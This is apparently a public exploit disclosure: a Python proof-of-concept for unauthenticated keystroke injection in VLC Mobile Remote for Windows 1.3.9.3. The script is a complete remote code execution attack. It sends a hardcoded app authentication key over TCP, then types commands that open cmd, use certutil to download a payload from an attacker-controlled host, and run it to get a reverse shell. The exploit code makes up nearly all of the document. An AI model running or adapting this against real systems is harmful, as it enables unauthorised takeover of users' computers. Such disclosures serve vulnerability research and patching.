# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3 Remote Code
Execution
# Date: 06/23/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://vlcmobileremote.com
# Software Link: https://vlcmobileremote.com/Releases/Setup.exe
# Version: 1.3.9.3
# Tested on: Windows 10 (Build 19044)

'''
Description:

VLC Mobile Remote for Windows 1.3.9.3 allows remote code execution via
unauthenticated keystroke injection over TCP, enabling command execution
and reverse shell delivery.

'''



import socket
import time


TARGET_IP = "192.168.8.105"
TARGET_PORT = 5916
payload = "shell.exe"
lhost = "192.168.8.100"


cmd = f'certutil -urlcache -split -f http://{lhost}/{payload}
C:\\\\Windows\\\\Temp\\\\payload.exe'
exec_path = "C:\\\\Windows\\\\Temp\\\\payload.exe"


def make_payload(request):
    timestamp = str(int(time.time() * 1000))
    return (
        '{"appAuthenticationKey":"I2t3H*9s65J7F!E03K9M",'
        '"password":"",'
        '"sentTime":"' + timestamp + '",'
        '"request":"' + request + '"}\x0a'
    )


requests = [
    ("/requests/keyboard/command?key=windows", "windows"),
    ("/requests/keyboard/command?key=textinput&value=cmd", "typing cmd"),
    ("/requests/keyboard/command?key=enter", "enter"),
    (f"/requests/keyboard/command?key=textinput&value={cmd}", "typing
download payload command"),
    ("/requests/keyboard/command?key=enter", "enter"),
    (f"/requests/keyboard/command?key=textinput&value={exec_path}", "typing
payload path"),
    ("/requests/keyboard/command?key=enter", "executing payload"),
]


with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    try:
        s.connect((TARGET_IP, TARGET_PORT))
        print(f"[+] Connected to {TARGET_IP}:{TARGET_PORT}")

        for i, (req, label) in enumerate(requests):
            payload = make_payload(req)
            s.sendall(payload.encode('utf-8'))
            print(f"[>] {label}")
            time.sleep(1)

        print("[✓] Done.")
    except Exception as e:
        print(f"[!] Error: {e}")